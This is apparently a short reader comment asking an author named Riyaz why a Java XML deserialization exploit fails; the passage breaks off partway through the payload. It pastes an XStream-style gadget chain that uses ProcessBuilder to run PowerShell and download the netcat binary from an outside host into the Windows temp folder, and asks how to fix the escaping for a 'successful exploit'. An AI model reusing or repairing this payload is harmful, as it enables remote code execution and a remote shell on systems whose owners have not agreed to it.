Hi Riyaz , tring to replicate the same however its not working

below part of the exploit trying to download ncat as suggested … may i know why its not working ? whenever i launch powershell alone process starts .. is it related to encoding and kind of escaping and what can be done for successful exploit

<iter class=”java.util.Collections$EmptyIterator”/>
<next class=”java.lang.ProcessBuilder”>
<command>
<string>powershell ipmo BitsTransfer;Start-BitsTransfer -Source http://192.168.56.102:8000/nc.exe -Destination C:\Windows\Temp\</string>
</command>
</next>
</iter>
<filter class=”javax.imageio.ImageIO$Cont